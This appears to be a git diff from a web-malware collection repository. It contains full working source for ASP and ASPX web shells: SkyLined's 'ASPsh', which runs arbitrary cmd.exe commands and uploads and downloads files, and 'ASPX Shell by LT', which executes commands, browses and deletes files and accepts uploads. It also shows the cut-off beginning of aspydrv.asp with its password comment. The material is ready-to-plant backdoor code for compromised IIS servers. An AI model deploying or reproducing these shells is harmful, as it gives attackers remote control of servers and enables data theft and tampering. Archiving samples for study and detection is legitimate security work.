function getVar(sName, sDefault) {
var oGetVar = Request.QueryString(sName);
return (oGetVar.Count == 1 ? unescape(oGetVar(1)) : sDefault);
}
// Return the value of a cookie variable or a default value if it's either
// not present or there is more than one such value.
function getCookie(sName, sDefault) {
var oCookieVar = Request.Cookies(escape(sName));
return oCookieVar != "" ? unescape(oCookieVar) : sDefault;
}
// Handle the POST data the way it should have been done by IIS.
var gaPOST = [];
if (
Request.ServerVariables("REQUEST_METHOD") == "POST" &&
Request.TotalBytes > 0
) {
// Convert the bytes to a unicode string we can manipulate in JavaScript
// Whomever designed this never really envisioned UNICODE if you ask me,
// but unfortunately it's what we have to work with, so we'll have to
// convert this to UNICODE using VBScript.
var sRequest = Request_RawData();
// We're assuming our data is encoded using multipart-formdata, but
// we'll check to make sure it makes sense:
var sCRLF = "\r\n";
var iEndSeperator = sRequest.indexOf(sCRLF);
if (iEndSeperator >= 0) { // A CRLF is required for our handler to work
// Find out what seperates each part of the data:
var sSeperator = sRequest.substr(0, iEndSeperator);
// And cut our data into portions using it:
var asRequest = sRequest.split(sSeperator);
// Because the data starts and ends with a seperator, the first and
// last element of our array do not contain any data. We can use
// this as a sanity check:
if (asRequest.length >= 3) {
asRequest.shift(); // Discard the first...
asRequest.pop(); // ... and last element.
for (var i in asRequest) {
// Each part starts with the "\r\n" that comes after a
// seperator, so we'll ignore that:
var sPart = asRequest[i].substr(
asRequest[i].indexOf(sCRLF) + sCRLF.length
);
// Get the information from inside the part
var aPart = processPostPart(sPart);
// If it processed correctly, we'll add it to the POST info:
if (aPart != null) gaPOST[aPart.name] = aPart;
}
}
}
}
function processPostPart(sPart) {
// Each part in a multi-part/formdata has one or more lines of header
// followed by a blank line, then there any number of bytes of raw data
// followed by a CRLF. First We'll split the header from the data by
// looking for this blank line:
var sEndHeader = "\r\n\r\n";
var iEndHeader = sPart.indexOf(sEndHeader);
if (iEndHeader < 0) return null; // No blank line: bad data
// Let's process the headers:
var asHeaders = sPart.substr(0, iEndHeader).split("\r\n");
// The first line must start with "Content-Disposition: form-data;"
// followed by the name of the variable and optionally a filename.
var rFirstLine = /^Content\-Disposition\: form\-data\; name=\"(.*?)\"(?:\; filename=\"(.*?)\")?$/;
var oMatch = asHeaders[0].match(rFirstLine);
if (oMatch == null) return null; // Bad data
// Then there might be a whole load of other headers, which we'll
// completely ignore for now... *TODO*
// Return the information about the headers and the raw data
return {
name: oMatch[1],
filename: (oMatch.length == 2 ? null : oMatch[2]),
data: sPart.substring(
iEndHeader + sEndHeader.length,
sPart.length - 2 // -2 == CRLF
)
};
}
// Return the value of a POST variable or a default value if it's either not
// supplied or something is wrong with the POST.
function postVar(sName) {
return (typeof(gaPOST[sName]) != "undefined" ? gaPOST[sName] : null);
}
/****************************************************************************
Stuff that makes outputting XML data easier.
****************************************************************************/
function outputXMLdata(asData) {
Response.ContentType = "text/plain";
for (var i in asData) {
Response.Write(escape(i) + "=" + escape(asData[i]) + "\n");
}
}
function outputXMLerror(e) {
return outputXMLdata({
error: (e.number == 0 ? "" : (((e.number < 0 ? 0x100000000 : 0) + e.number)).toString(16) + " ") +
e.message
});
}
/****************************************************************************
ASPsh can finally start doing something useful here:
****************************************************************************/
var gsAppName = "ASPsh";
var gsAppVersion = "v1.0";
var gsAuthor = "Berend-Jan &quot;SkyLined&quot; Wever";
var gsCopyright = "Copyright (C) 2003-2010";
var goWSS = new ActiveXObject("WScript.Shell");
var gsRequest = getVar("req", "main");
var gsCommand = getVar("cmd", "");
// var gsCwd = getVar("cwd", getCookie("cwd", new String(goWSS.CurrentDirectory)));
// var gsCwd = getCookie("cwd", new String(goWSS.CurrentDirectory));
var gsCwd = getCookie("cwd", "(unknown)");
var giTimeout = parseInt(getVar("timeout", "0"));
var goUploadSource = postVar("uploadsource");
var goUploadDestination = postVar("uploaddestination");
var goDownloadSource = getVar("downloadsource");
switch (gsRequest) {
case "inf": getInformation(); break;
case "cmd": executeCommand(); break;
case "upload": uploadFile(); break;
case "download": downloadFile(); break;
case "main": outputMainpage(); break;
default: Response.Write("Error"); break;
}
function getInformation() {
try {
var sIISVer = Request.ServerVariables("SERVER_SOFTWARE");
var sUsername = Request.ServerVariables("LOGON_USER");
var sCmd = "cmd.exe /Q /C " +
"ver" +
"&hostname" +
"&cd" + (sUsername == "" ? "&whoami" : "");
var sDebug = "cmd=" + sCmd + "\n";
var oCMD = goWSS.Exec(sCmd);
var asStdOut = [];
if (!oCMD.Stderr.AtEndOfStream) {
var sStdErr = new String(oCMD.Stderr.ReadAll());
throw new Error("Error while getting system information: " +
"exit code = " + oCMD.ExitCode + ", stderr output:\n" +
sStdErr
);
}
if (oCMD.ExitCode != 0) {
throw new Error("Error while getting system information: " +
"exit code = " + oCMD.ExitCode + ".");
}
if (!oCMD.Stdout.AtEndOfStream) {
asStdOut = new String(oCMD.Stdout.ReadAll()).replace(/\r/g, "").split("\n");
}
sDebug += "stdout=\"" + asStdOut.join("\", \"") + "\"\n";
var sFirstLine = asStdOut.shift();
if (sFirstLine != "") {
throw new Error("First line of cmd output is expect to be " +
"empty, found \"" + sFirstLine + "\".");
}
var sWinVer = asStdOut.shift();
if (!/^Microsoft Windows/.test(sWinVer)) {
throw new Error("Second line of cmd output is expect to be " +
"the windows version, found \"" + sWinVer + "\".");
}
var sHostname = asStdOut.shift();
if (!/[^\s]/.test(sHostname)) {
throw new Error("Third line of cmd output is expect to be " +
"the hostname, found \"" + sHostname + "\".");
}
var sCwd = asStdOut.shift();
if (!/[A-Za-z]\:\\/.test(sCwd)) {
throw new Error("Fifth line of cmd output is expect to be " +
"the current working directory, found \"" + sCwd + "\".");
}
if (sUsername == "") sUsername = asStdOut.shift();
if (!/[^\s]/.test(sUsername)) {
throw new Error("Sixth line of cmd output is expect to be " +
"whoami output, found \"" + sUsername + "\".");
}
if (asStdOut.length != 1) {
throw new Error("Additional lines found in cmd output: \n" +
asStdOut.join("\n"));
}
return outputXMLdata({
"os version": sWinVer,
"server version": sIISVer,
"hostname": sHostname,
"username": sUsername,
"cwd": sCwd,
"debug": sDebug
});
} catch(e) {
return outputXMLerror(e);
}
}
function getRandomString(iLength) {
var sRandom = "";
var sRandomChars = "QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm1234567890";
while (sRandom.length < iLength) sRandom += sRandomChars.charAt(Math.floor(Math.random() * sRandomChars.length));
return sRandom;
}
function executeCommand() {
try {
var sRandom = getRandomString(0x20);
var goWSS = new ActiveXObject("WScript.Shell");
var gsCwdCommand = (gsCwd == "" || gsCwd == "(unknown)" ? "" :
"(" + gsCwd.substr(0, 2) + "&cd \"" + gsCwd.substr(2) + "\")&");
var sCmd = "CMD.EXE /Q /V:ON /C " +
gsCwdCommand +
(/^\s*$/.test(gsCommand) ? "" : "(" + gsCommand + ")&") +
"echo " + sRandom + " !ERRORLEVEL! !CD!&exit";
var sDebug = "cmd=" + sCmd + "\n";
var oCMD = goWSS.Exec(sCmd);
var iStartTime = new Date().valueOf();
var sStdOut = "", asStdOut = [], sStdErr = "", asStdErr = [];
var sErrorLevelAndCwd = "";
var bDone = false;
var iTimeout = 0;
do {
while (!oCMD.Stdout.AtEndOfStream) {
var sChar = oCMD.StdOut.Read(1);
switch (sChar) {
case "\r": break;
case "\n":
if (sStdOut.substr(0, sRandom.length) == sRandom) {
sErrorLevelAndCwd = sStdOut.substr(sRandom.length + 1);
oCMD.Terminate();
bDone = true;
break;
}
asStdOut.push(sStdOut);
sStdOut = "";
break;
default:
sStdOut += sChar;
break;
}
}
while (!oCMD.StdErr.AtEndOfStream) {
var sChar = oCMD.StdErr.Read(1);
switch (sChar) {
case "\r": break;
case "\n":
asStdErr.push(sStdErr);
sStdErr = "";
break;
default:
sStdErr += sChar;
break;
}
}
if (oCMD.Status != 0) {
bDone = true;
} else if (new Date().valueOf() < iStartTime + giTimeout * 1000) {
goWSS.Popup("Waiting for command to finish...", 1);
} else {
iTimeout = Math.round((new Date().valueOf() - iStartTime) / 1000);
bDone = true;
}
} while (!bDone);
var iNow = new Date().valueOf();
sDebug += "start=" + iStartTime + ", end=" + iNow + ", elapsed=" + (iNow-iStartTime) + ", timeout=" + giTimeout + "\n";
sDebug += "stdout=\"" + asStdOut.join("\", \"") + "\"\n";
sDebug += "stderr=\"" + asStdErr.join("\", \"") + "\"\n";
var sErrorLevel = "0";
var sCwd = gsCwd;
if (iTimeout == 0) {
if (!/^[0-9]+\s[A-Z]\:\\/i.test(sErrorLevelAndCwd)) {
throw new Error("Last line of cmd output is expect to be " +
"the errorlevel and current working directory, found " +
"\"" + sErrorLevelAndCwd + "\".");
}
sDebug += "lastline=\"" + sErrorLevelAndCwd + "\"\n";
var iSpaceIndex = sErrorLevelAndCwd.indexOf(" ");
sDebug += "spaceindex=" + iSpaceIndex + "\n";
var sErrorLevel = sErrorLevelAndCwd.substr(0, iSpaceIndex);
var sCwd = sErrorLevelAndCwd.substr(iSpaceIndex + 1);
}
return outputXMLdata({
"cwd": sCwd,
"errorlevel": sErrorLevel,
"stdout": asStdOut.join("\n"),
"stderr": asStdErr.join("\n"),
"timeout": iTimeout,
"debug": sDebug
});
} catch(e) {
return outputXMLerror(e);
}
}
function uploadFile() {
if (
goUploadSource == null ||
goUploadSource.filename == null ||
goUploadSource.data == null ||
goUploadDestination == null ||
goUploadDestination.data == null
) {
return outputTransferStatus(
false,
"Upload: POST data is missing information.<BR>"
);
}
var sSourcePath = goUploadSource.filename;
var sFilename = sSourcePath.lastIndexOf("\\") < 0 ? sSourcePath :
sSourcePath.substr(sSourcePath.lastIndexOf("\\") + 1);
var sDestinationPath = goUploadDestination.data;
if (sDestinationPath == "") sDestinationPath = gsCwd;
var sFileData = goUploadSource.data;
// Check if the target path is a directory and if so, add the uploaded
// filename to the target path:
var oFSO = new ActiveXObject("Scripting.FileSystemObject");
if (
/\\$/.test(sDestinationPath) || // Ends with slash "\"
oFSO.FolderExists(sDestinationPath)
) {
if (sFilename == "") {
return outputTransferStatus(
false,
"Upload: No filename specified.<BR>"
);
}
if (sDestinationPath.charAt(sDestinationPath.length - 1) != "\\") {
sDestinationPath += "\\";
}
sDestinationPath += sFilename;
}
// Now we need to safe the file to disk. ADODB.Stream is used because
// Scripting.FileSystemObject behaved bad for unknown reasons. I had
// some issues getting this correct, because writing binary files did
// not work for unknown reasons. So I write to text files, using a
// character set that doesn't translate any character. This effectively
// makes it equal to a binary write: problem solved.
try {
var oAS = new ActiveXObject("ADODB.Stream");
oAS.Mode = 3; // ReadWrite
oAS.Type = 2; // 2 = Text, 1= Binary
oAS.Charset = "ISO-8859-1"; // No translation of characters
oAS.Open(); // Open the stream
oAS.WriteText(goUploadSource.data); // Write the data
oAS.SaveToFile(sDestinationPath, 2); // Save to our destination
oAS.Close();
} catch (e) {
return outputTransferStatus(
false,
"Upload: Error writing file" +
" \"" + sSourcePath + "\" to" +
" \"" + sDestinationPath + "\"" +
" : " + e.message + "<BR>"
);
}
outputTransferStatus(
true,
"Successfully uploaded" +
" \"" + sSourcePath + "\" to" +
" \"" + sDestinationPath + "\"" +
" (" + goUploadSource.data.length + " bytes)<BR>"
);
}
function downloadFile() {
var sSourcePath = (
goDownloadSource == null ||
goDownloadSource == ""
? "" : goDownloadSource);
if (sSourcePath == "") {
return outputTransferStatus(
false,
"Download: No filename specified"
);
}
var sFilename = sSourcePath;
// If a path is not supplied, use the CWD from the cookie. Otherwise,
// cut the path from the filename varaible.
if (sSourcePath.lastIndexOf("\\") < 0) {
sSourcePath = gsCwd +
(gsCwd.charAt(gsCwd.length - 1) == "\\" ? "" : "\\") +
sFilename;
} else {
sFilename = sSourcePath.substr(sSourcePath.lastIndexOf("\\") + 1);
}
var sBuffer = null;
try {
var oAS = new ActiveXObject("ADODB.Stream");
oAS.Mode = 3; // ReadWrite
oAS.Type = 2; // 2 = Text, 1= Binary
oAS.Charset = "ISO-8859-1"; // No translation of characters
oAS.Open(); // Open the stream
oAS.LoadFromFile(sSourcePath); // Load our file into the buffer
sBuffer = oAS.ReadText();
oAS.Close();
} catch (e) {
return outputTransferStatus(
false,
"Download: Error reading file" +
" \"" + sSourcePath + "\" " +
" : " + e.message + "<BR>"
);
}
Response.addHeader("Content-Disposition", "attachment; filename=" + sFilename);
Response.addHeader("Content-Length", sBuffer.length);
Response.ContentType = "application/octet-stream"; // generic stuff
Response_RawData(sBuffer); // Output the buffer
}
</SCRIPT>
<% function outputTransferStatus(bSuccess, sStatus) { %>
<SCRIPT type="text/JavaScript" language="JavaScript">
parent.document.getElementById("output").innerHTML +=
"<BR><%=bSuccess ? JSencode(sStatus) : JSencode("<SPAN class=\"stderr\">" + sStatus + "</SPAN>")%>";
</SCRIPT>
<% } %>
<% function outputMainpage() { %>
<HTML>
<HEAD>
<TITLE><%=gsAppName%>&nbsp;<%=gsAppVersion%> loading...</TITLE>
<STYLE>
* {
text-overflow: ellipsis;
vertical-align: top;
}
TABLE,TR,TD, FORM {
margin:0px; padding: 0px; border:0px; border-spacing:0px;
}
FIELDSET {
width: 100%;
}
LEGEND {
padding-right: 7px;
}
.button {
border: 2px outset ButtonFace; margin-left:2px;
font: 9pt Arial;
color:black; background:ButtonFace;
}
.buttonwidth {
width: 80px;
}
.input1 {
margin-top:-1px;
}
.inset {
border: 2px inset ButtonFace;
}
.cmd {
font: 9pt Courier New, Courier;
color:white;
background:black;
}
.highlight { color: white; background:transparent; }
.stdout { color: silver; background:transparent; }
.stderr { color: red; background:transparent; }
.debug {
xdisplay: none; /* uncomment if you want to see this */
color: gray;
background:transparent;
}
</STYLE>
</HEAD>
<BODY onLoad="return body_onload();" onKeyDown="return body_onkeydown();">
<FIELDSET>
<LEGEND id="title">Loading...</LEGEND>
<DIV class="inset cmd">
<SPAN id="output" class="cmd"></SPAN><BR>
<FORM onSubmit="return form_onsubmit()">
<TABLE cellspacing=0 cellpassing=0 style="width:100%;"><TR>
<TD><NOBR style="width:100%;" class="cmd stdout" id="prompt"></NOBR></TD>
<TD style="width:100%;"><INPUT style="width:100%; margin: 0px; padding: 0px; margin-top:-1px; border:0px;" class="cmd" type="text" id="input"></TD>
</TR></TABLE>
</FORM>
</DIV>
</FIELDSET>
<FIELDSET>
<LEGEND id="title">Up-/Download center</LEGEND>
<TABLE cellspacing=2 cellpassing=0 style="width:100%;"><TR>
<FORM enctype="multipart/form-data" method="post" action="?req=upload" target="transferFrame">
<TD><NOBR style="width:100%;">Upload from:</NOBR></TD>
<TD style="width:100%;" colspan="2"><INPUT type="file" style="width:100%;" name="uploadsource" id="uploadFrom"></TD>
</TR><TR>
<TD><NOBR style="width:100%;">Upload to:</NOBR></TD>
<TD style="width:100%;"><INPUT type="text" style="width:100%;" name="uploaddestination" id="uploadTo"></TD>
<TD class="buttonwidth"><INPUT type="submit" class="buttonwidth" value="Upload" id="uploadButton"></TD>
</FORM>
</TR><TR>
<FORM method="get" action="?" target="transferFrame">
<INPUT type="hidden" name="req" value="download">
<TD><NOBR style="width:100%;">Download from:</NOBR></TD>
<TD style="width:100%;"><INPUT type="text" style="width:100%;" name="downloadsource" id="downloadFrom"></TD>
<TD class="buttonwidth"><INPUT type="submit" class="buttonwidth" value="Download" id="downloadButton"></TD>
</FORM>
</TR></TABLE>
</FIELDSET>
<IFRAME id="focus" style="display:none" name="transferFrame"></IFRAME><BR>
<SPAN id="debug" class="debug"></SPAN>
</BODY>
<SCRIPT type="text/JavaScript" language="JavaScript">
var gbLoaded = false;
var goTitle = document.getElementById("title");
var goOutput = document.getElementById("output");
var goPrompt = document.getElementById("prompt");
var goInput = document.getElementById("input");
var goFocus = document.getElementById("focus");
var goUploadFrom = document.getElementById("uploadFrom");
var goUploadTo = document.getElementById("uploadTo");
var goUploadButton = document.getElementById("uploadButton");
var goDownloadFrom = document.getElementById("downloadFrom");
var goDownloadButton = document.getElementById("downloadButton");
var goDebug = document.getElementById("debug");
var goFocus = document.getElementById("focus");
var gsUrl = location.protocol + "//" + location.host + location.pathname;
var gsCwd = "(unknown)";
var giTimeout = 30;
var gaHistory = [""], giHistory = 0;
function getXML(asData) {
var oXML = new XMLHttpRequest();
asQuery = [];
for (var i in asData) {
asQuery.push(escape(i) + "=" + escape(asData[i]));
}
oXML.open("GET", gsUrl + (asQuery.length > 0 ? "?" + asQuery.join("&") : ""), false);
oXML.send(null);
var asResponse = new String(oXML.responseText).split("\n");
var aResult = [];
while (asResponse.length > 0) {
var sLine = asResponse.pop();
if (sLine.indexOf("=") >= 0) {
var asLine = sLine.split("=");
aResult[unescape(asLine[0])] = unescape(asLine[1]);
}
}
return aResult;
}
function body_onload() {
var asInformation = getXML({req:"inf"});
var sOSVersion = "(unknown)";
var sServerVersion = "(unknown)";
var sHostname = "(unknown)";
var sUsername = "(unknown)";
var sDebug = "";
var bError = false;
for (var i in asInformation) {
switch(i) {
case "os version": sOSVersion = asInformation[i]; break;
case "server version": sServerVersion = asInformation[i]; break;
case "hostname": sHostname = asInformation[i]; break;
case "username": sUsername = asInformation[i]; break;
case "cwd": gsCwd = asInformation[i]; break;
case "debug": sDebug += HTMLencode(asInformation[i]); break;
default:
sDebug += "Unexpected: " + HTMLencode(i) + "=" + HTMLencode(asInformation[i]) + "<BR>";
bError = true;
// Ignore useless extra info
}
}
document.title = sUsername + " @ " + sHostname;
goTitle.innerHTML = HTMLencode("CMD.EXE " + sUsername + " @ " + sHostname);
goOutput.innerHTML = HTMLencode(
"<%=gsAppName%>\ <%=gsAppVersion%> on " +
sServerVersion + ", " + sOSVersion
) + "<BR>" +
"<%=gsCopyright%>&nbsp;<%=gsAuthor%>.<BR>" +
(bError ? "<SPAN class=\"stderr\">An internal error has occured.<BR></SPAN>" : "");
goPrompt.innerHTML = HTMLencode(gsCwd) + ">";
goUploadTo.value = gsCwd;
setCookie("cwd", gsCwd);
goInput.focus();
gbLoaded = true;
goDebug.innerHTML = sDebug +
"<BR>Cookie: " + HTMLencode(JSencode(document.cookie)) +
"<BR>Cwd: \"" + HTMLencode(JSencode(gsCwd)) + "\"";
return true;
}
function form_onsubmit() {
if (gbLoaded) {
var sOldCwd = gsCwd;
var asInformation = getXML({
req:"cmd",
cmd:goInput.value,
cwd:gsCwd,
timeout:giTimeout
});
var iErrorLevel = 0;
var sStdOut = "";
var sStdErr = "";
var sDebug = "";
var iTimeout = 0;
var bError = false;
for (var i in asInformation) {
switch(i) {
case "cwd": gsCwd = asInformation[i]; break;
case "errorlevel": iErrorLevel = asInformation[i]; break;
case "stdout": sStdOut = asInformation[i]; break;
case "stderr": sStdErr = asInformation[i]; break;
case "debug": sDebug += HTMLencode(asInformation[i]); break;
case "timeout": iTimeout = parseInt(asInformation[i]); break;
default:
sDebug += "Unexpected: " + HTMLencode(i) + "=" + HTMLencode(asInformation[i]) + "<BR>";
bError = true;
// Ignore useless extra info
}
}
goOutput.innerHTML +=
"<SPAN class=\"stdout\"><BR>" + goPrompt.innerHTML + "</SPAN>" +
HTMLencode(goInput.value) + "<BR>" +
"<SPAN class=\"stdout\">" + HTMLencode(sStdOut) + "</SPAN>" +
"<SPAN class=\"stderr\">" + HTMLencode(sStdErr) + "</SPAN>" +
(iErrorLevel != 0 ? "<SPAN class=\"stderr\">(ERROR LEVEL = " + iErrorLevel + ")<BR></SPAN>" : "") +
(bError ? "<SPAN class=\"stderr\">An internal error has occured.<BR></SPAN>" : "") +
(iTimeout != 0 ? "<SPAN class=\"stderr\">The command timed out after " + iTimeout + " seconds.<BR></SPAN>" : "");
goPrompt.innerHTML = HTMLencode(gsCwd) + ">";
setCookie("cwd", gsCwd);
addHistory();
goInput.value = "";
if (sOldCwd != gsCwd && goUploadTo.value == sOldCwd) {
goUploadTo.value = gsCwd;
}
goInput.focus();
goFocus.scrollIntoView(false);
goDebug.innerHTML = sDebug +
"<BR>Cookie: " + HTMLencode(JSencode(document.cookie)) +
"<BR>Cwd: \"" + HTMLencode(JSencode(gsCwd)) + "\"";
}
return false;
}
function body_onkeydown() {
if (gbLoaded) {
switch(document.activeElement) {
case goUploadFrom:
case goUploadTo:
case goUploadButton:
case goDownloadFrom:
case goDownloadButton:
// Don't do anything.
break;
case goInput:
default:
goInput.focus();
switch(event.keyCode) {
case 38: goHistory(-1); break;
case 40: goHistory(+1); break;
break;
}
event.cancelBubble = true;
break;
}
}
return true;
}
function addHistory() {
if (
/[^\s]/.test(goInput.value) && // No empty strings
gaHistory[giHistory] != goInput.value // Only if changed
) {
if (giHistory != 0) {
// 0 a B c d (B = giHistory, E = inserted)
var aPreHistory = gaHistory.splice(1, giHistory);
// 0 c d (a B = aPreHistory)
for (var i in aPreHistory) {
gaHistory.push(aPreHistroy[i]);
}
// 0 c d a B
giHistory = 0;
}
}
gaHistory.push(goInput.value);
}
function goHistory(iMove) {
if (gaHistory[giHistory] != goInput.value) {
addHistory();
if (iMove > 0) iMove++;
}
giHistory += iMove;
while (giHistory < 0) giHistory += gaHistory.length
giHistory %= gaHistory.length
goInput.value = gaHistory[giHistory];
}
function setCookie(sName, sValue) {
document.cookie = escape(sName) + "=" + escape(sValue);
}
function HTMLencode(sText) {
return sText.replace(/[\<\>\"\&\r\n \t]/g, function (sChar, iIndex) {
switch (sChar) {
case '\r': return "";
case '\n': return "<BR>";
case ' ': return "&nbsp;";
case '\t': return "&nbsp;&nbsp;&nbsp;&nbsp;";
default: return "&#" + sChar.charCodeAt(0) + ";";
}
});
}
function JSencode(sText) {
return sText.replace(/[\x00-\x1F\"\'\\\u0100-\uFFFF]/g, function (c) {
var sic = c.charCodeAt(0).toString(16);
if (sic.length == 1) return "\\x0" + sic;
if (sic.length == 2) return "\\x" + sic;
if (sic.length == 3) return "\\u0" + sic;
return "\\u" + sic;
});
}
</SCRIPT>
</BODY>
</HTML>
<% } %>

2590
web-malware-collection-13-06-2012/ASP/aspxSH.txt Normal file
View file

File diff suppressed because it is too large Load diff

161
web-malware-collection-13-06-2012/ASP/aspxshell.aspx.txt Normal file
View file

@ -0,0 +1,161 @@
<%-- ASPX Shell by LT <lt@mac.hush.com> (2007) --%>
<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%
string outstr = "";
// get pwd
string dir = Page.MapPath(".") + "/";
if (Request.QueryString["fdir"] != null)
dir = Request.QueryString["fdir"] + "/";
dir = dir.Replace("\\", "/");
dir = dir.Replace("//", "/");
// build nav for path literal
string[] dirparts = dir.Split('/');
string linkwalk = "";
foreach (string curpart in dirparts)
{
if (curpart.Length == 0)
continue;
linkwalk += curpart + "/";
outstr += string.Format("<a href='?fdir={0}'>{1}/</a>&nbsp;",
HttpUtility.UrlEncode(linkwalk),
HttpUtility.HtmlEncode(curpart));
}
lblPath.Text = outstr;
// create drive list
outstr = "";
foreach(DriveInfo curdrive in DriveInfo.GetDrives())
{
if (!curdrive.IsReady)
continue;
string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
outstr += string.Format("<a href='?fdir={0}'>{1}</a>&nbsp;",
HttpUtility.UrlEncode(driveRoot),
HttpUtility.HtmlEncode(driveRoot));
}
lblDrives.Text = outstr;
// send file ?
if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0))
{
Response.ClearContent();
Response.WriteFile(Request.QueryString["get"]);
Response.End();
}
// delete file ?
if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0))
File.Delete(Request.QueryString["del"]);
// receive files ?
if(flUp.HasFile)
{
string fileName = flUp.FileName;
int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' });
if (splitAt >= 0)
fileName = flUp.FileName.Substring(splitAt);
flUp.SaveAs(dir + "/" + fileName);
}
// enum directory and generate listing in the right pane
DirectoryInfo di = new DirectoryInfo(dir);
outstr = "";
foreach (DirectoryInfo curdir in di.GetDirectories())
{
string fstr = string.Format("<a href='?fdir={0}'>{1}</a>",
HttpUtility.UrlEncode(dir + "/" + curdir.Name),
HttpUtility.HtmlEncode(curdir.Name));
outstr += string.Format("<tr><td>{0}</td><td>&lt;DIR&gt;</td><td></td></tr>", fstr);
}
foreach (FileInfo curfile in di.GetFiles())
{
string fstr = string.Format("<a href='?get={0}' target='_blank'>{1}</a>",
HttpUtility.UrlEncode(dir + "/" + curfile.Name),
HttpUtility.HtmlEncode(curfile.Name));
string astr = string.Format("<a href='?fdir={0}&del={1}'>Del</a>",
HttpUtility.UrlEncode(dir),
HttpUtility.UrlEncode(dir + "/" + curfile.Name));
outstr += string.Format("<tr><td>{0}</td><td>{1:d}</td><td>{2}</td></tr>", fstr, curfile.Length / 1024, astr);
}
lblDirOut.Text = outstr;
// exec cmd ?
if (txtCmdIn.Text.Length > 0)
{
Process p = new Process();
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.WorkingDirectory = dir;
p.Start();
lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
txtCmdIn.Text = "";
}
%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>ASPX Shell</title>
<style type="text/css">
* { font-family: Arial; font-size: 12px; }
body { margin: 0px; }
pre { font-family: Courier New; background-color: #CCCCCC; }
h1 { font-size: 16px; background-color: #00AA00; color: #FFFFFF; padding: 5px; }
h2 { font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
th { text-align: left; background-color: #99CC99; }
td { background-color: #CCFFCC; }
pre { margin: 2px; }
</style>
</head>
<body>
<h1>ASPX Shell by LT</h1>
<form id="form1" runat="server">
<table style="width: 100%; border-width: 0px; padding: 5px;">
<tr>
<td style="width: 50%; vertical-align: top;">
<h2>Shell</h2>
<asp:TextBox runat="server" ID="txtCmdIn" Width="300" />
<asp:Button runat="server" ID="cmdExec" Text="Execute" />
<pre><asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre>
</td>
<td style="width: 50%; vertical-align: top;">
<h2>File Browser</h2>
<p>
Drives:<br />
<asp:Literal runat="server" ID="lblDrives" Mode="PassThrough" />
</p>
<p>
Working directory:<br />
<b><asp:Literal runat="server" ID="lblPath" Mode="passThrough" /></b>
</p>
<table style="width: 100%">
<tr>
<th>Name</th>
<th>Size KB</th>
<th style="width: 50px">Actions</th>
</tr>
<asp:Literal runat="server" ID="lblDirOut" Mode="PassThrough" />
</table>
<p>Upload to this directory:<br />
<asp:FileUpload runat="server" ID="flUp" />
<asp:Button runat="server" ID="cmdUpload" Text="Upload" />
</p>
</td>
</tr>
</table>
</form>
</body>
</html>

828
web-malware-collection-13-06-2012/ASP/aspydrv.asp Normal file
View file

@ -0,0 +1,828 @@
# password is t00ls.org
<%
Function BufferContent(data)
Dim strContent(64)
Dim i
ClearString strContent
For i = 1 To LenB(data)
AddString strContent,Chr(AscB(MidB(data,i,1)))
Next
BufferContent = fnReadString(strContent)
End Function
Sub ClearString(part)
Dim index
For index = 0 to 64
part(index)=""
Next
End Sub
Sub AddString(part,newString)
Dim tmp
Dim index
part(0) = part(0) & newString
If Len(part(0)) > 64 Then
index=0
tmp=""
Do
tmp=part(index) & tmp
part(index) = ""
index = index + 1
Loop until part(index) = ""
part(index) = tmp
End If
End Sub
Function fnReadString(part)
Dim tmp
Dim index
tmp = ""
For index = 0 to 64
If part(index) <> "" Then
tmp = part(index) & tmp
End If
Next
FnReadString = tmp
End Function
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
